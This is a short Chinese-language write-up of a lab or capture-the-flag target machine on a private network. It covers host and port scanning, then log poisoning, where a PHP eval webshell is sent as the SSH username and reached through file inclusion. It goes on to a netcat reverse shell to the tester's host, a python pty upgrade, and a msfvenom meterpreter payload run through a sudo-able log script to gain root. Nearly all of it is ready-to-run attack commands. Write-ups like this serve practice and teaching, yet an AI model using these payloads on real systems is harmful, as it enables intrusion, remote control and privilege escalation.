这里是引用
&&信息收集&&
首先ip收集
nmap 192.168.99.0/24
再来查看详细信息和是否有隐藏端口
nmap -A -p- 192.168.99.15
好像没有隐藏的端口,靶机开放两个端口,靶机系统为Ubuntu,apache服务器
目录扫描
dirb
dirb http://192.168.99.15 /usr/share/wordlists/dirb/big.txt
并未发现什么有价值的目录
&&渗透&&
访问页面
可能存在文件包含
根据它开启的服务,我们查看其的日志(ssh的)
然后我们使用一句话木马来进行名字替代
ssh ‘<?php eval($_GET['cmd']);?>’@192.168.99.15
bp的包在路径后面加上a=phpinfo();测试一下,成功
加上cmd参数在重新发包一下
执行成功
获取shell
mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe在这里插入代码片
记得url编码
mknod+backpipe+p+%26%26+nc+192.168.99.6+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
shell反弹成功
交互式命令
python -c ‘import pty;pty.spawn("/bin/bash")’
貌似权限不太足
提取
awk ‘BEGIN{system("/bin/bash")}’
root提取
提权
创建个木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.99.6 LPORT=8888 -f elf > shell.elf
将木马移动到www目录下
切换到/var/www/html
开启apache服务
靶机木马下载,成功
给予权限
msfconsole监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.99.6
set lport 8888
run
靶机运行木马
sudo ./xxxlogauditorxxx.py
/var/log/auth.log|./shell.elf
提权成功